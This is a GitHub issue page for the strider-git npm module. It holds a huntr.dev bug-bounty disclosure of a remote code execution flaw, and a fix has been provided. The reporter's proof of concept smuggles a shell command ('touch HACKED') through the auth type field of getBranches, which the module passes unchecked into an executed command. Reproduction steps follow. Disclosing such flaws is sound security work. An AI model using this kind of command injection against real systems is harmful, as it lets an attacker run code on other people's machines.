-
Notifications
You must be signed in to change notification settings - Fork 16
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #38
Comments
@Mik317 would love to learn more about the issue |
Hi @knownasilya :). Here are the steps to reproduce the issue: Steps To Reproduce:
// poc.js
var git = require("strider-git/lib");
git.getBranches({auth:{type:'ssaas;touch HACKED; ', privkey:'sss'}, url:'http://sss'}, '', function(){})
npm i strider-git # Install affected module
git init # Initialize as *git* dir
node poc.js # Run the PoC
Regards, |
🛠️ A fix has been provided for this issue. Please reference: 418sec#1 🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform. |
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Overview
strider-git allows strider to use any git repository for a project.
he issue occurs because a
user input
is formatted inside acommand
that will be executed without any check.Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
Automatically generated by @huntr-helper...
The text was updated successfully, but these errors were encountered: